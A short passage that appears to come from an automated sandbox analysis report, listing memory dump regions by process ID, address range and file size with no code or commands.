memory/4892-275-0x00000000074F0000-0x00000000074F1000-memory.dmpFilesize
4KB
-
memory/4892-272-0x0000000006B90000-0x0000000006B91000-memory.dmpFilesize
4KB
-
memory/4952-260-0x0000000000000000-mapping.dmp
-
memory/4980-426-0x0000000000000000-mapping.dmp
-
memory/4988-302-0x0000000004930000-0x00000000049C2000-memory.dmpFilesize
584KB
-
memory/4988-300-0x0000000004880000-0x0000000004924000-memory.dmpFilesize
656KB
-
memory/4988-290-0x00000000047D0000-0x000000000487B000-memory.dmpFilesize
684KB
-
memory/4988-267-0x0000000004300000-0x000000000443A000-memory.dmpFilesize
1.2MB
-
memory/4988-264-0x0000000000000000-mapping.dmp
-
memory/5028-268-0x0000000000000000-mapping.dmp
-
memory/5048-435-0x0000000000000000-mapping.dmp
-
memory/5080-270-0x0000000000000000-mapping.dmp